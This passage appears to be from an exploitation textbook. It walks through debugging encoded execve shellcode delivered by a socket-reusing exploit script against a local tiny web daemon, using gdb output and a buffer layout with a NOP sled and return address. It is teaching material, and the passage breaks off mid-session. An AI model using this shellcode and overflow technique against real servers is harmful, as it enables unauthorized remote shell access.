Graphics Programs Reference
In-Depth Information
push ebx ; push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
The decoding loop uses the EDX register as a counter. It begins at 8
and counts down to 0, since 8 bytes need to be decoded. Exact stack addresses
don't matter in this case since the important parts are all relatively addressed,
so the output below doesn't bother attaching to an existing tinywebd process.
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q ./a.out
warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/reader/booksrc/a.out
S
tarting tiny web daemon..
Since the breakpoints are actually part of the shellcode, there is no need
to set one from GDB. From another terminal, the shellcode is assembled and
used with the socket-reusing exploit tool.
From Another Terminal
reader@hacking:~/booksrc $ nasm encoded_sockreuserestore_dbg.s
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh encoded_socketreuserestore_dbg 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore_dbg (72 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 313] [shellcode 72] [ret addr 128] [*fake_addr 8]
l
ocalhost [127.0.0.1] 80 (www) open
Back in the GDB window, the first
int3
instruction in the shellcode is hit.
From here, we can verify that the string decodes properly.
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 12400]
0xbffff6ab in ?? ()
(gdb) x/10i $eip
0xbffff6ab: push 0x8
0xbffff6ad: pop edx
0xbffff6ae: sub BYTE PTR [ebx+edx],0x5
0xbffff6b2: dec edx
0xbffff6b3: jns 0xbffff6ae
0xbffff6b5 int3
0xbffff6b6: xor edx,edx
0xbffff6b8: push edx
0xbffff6b9: mov edx,esp
0xbffff6bb: push ebx
(gdb) x/8c $ebx
